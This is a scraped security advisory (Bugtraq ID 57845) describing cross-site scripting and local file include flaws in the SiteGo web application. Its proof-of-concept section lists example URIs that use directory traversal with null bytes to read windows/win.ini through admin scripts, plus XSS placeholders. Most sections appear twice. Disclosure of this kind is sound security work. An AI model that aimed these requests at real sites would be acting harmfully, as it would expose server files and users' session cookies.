SiteGo Multiple Cross Site Scripting and Local File Include Vulnerabilities
BID:57845
Info
SiteGo Multiple Cross Site Scripting and Local File Include Vulnerabilities
| Bugtraq ID: | 57845 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 07 2013 12:00AM |
| Updated: | Feb 07 2013 12:00AM |
| Credit: | L0n3ly-H34rT |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
SiteGo Multiple Cross Site Scripting and Local File Include Vulnerabilities
SiteGo is prone to multiple cross-site scripting and local file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the web server process.
SiteGo is prone to multiple cross-site scripting and local file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the web server process.
Exploit / POC
SiteGo Multiple Cross Site Scripting and Local File Include Vulnerabilities
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/site-go/admin/extra/contacts/DownloadMailAttach.php?file=../../../../../../../../../../windows/win.ini%00
http://www.example.com/site-go/admin/extra/StyleManager/EditFile.php?OpenFolder=../../../../../../../../../../windows/win.ini%00
http://www.example.com/site-go/admin/edit_config/index.php?idc=../../../../../../../../../../windows/win.ini%00
http://www.example.com/site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../windows/win.ini%00
http://www.example.com/site-go/?action=vote&Browse=[XSS]
http://www.example.com/site-go/?action=MailList&articles=&B1=����&delete=[XSS]&reason=1
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/site-go/admin/extra/contacts/DownloadMailAttach.php?file=../../../../../../../../../../windows/win.ini%00
http://www.example.com/site-go/admin/extra/StyleManager/EditFile.php?OpenFolder=../../../../../../../../../../windows/win.ini%00
http://www.example.com/site-go/admin/edit_config/index.php?idc=../../../../../../../../../../windows/win.ini%00
http://www.example.com/site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../windows/win.ini%00
http://www.example.com/site-go/?action=vote&Browse=[XSS]
http://www.example.com/site-go/?action=MailList&articles=&B1=����&delete=[XSS]&reason=1
Solution / Fix
SiteGo Multiple Cross Site Scripting and Local File Include Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
SiteGo Multiple Cross Site Scripting and Local File Include Vulnerabilities
References:
References: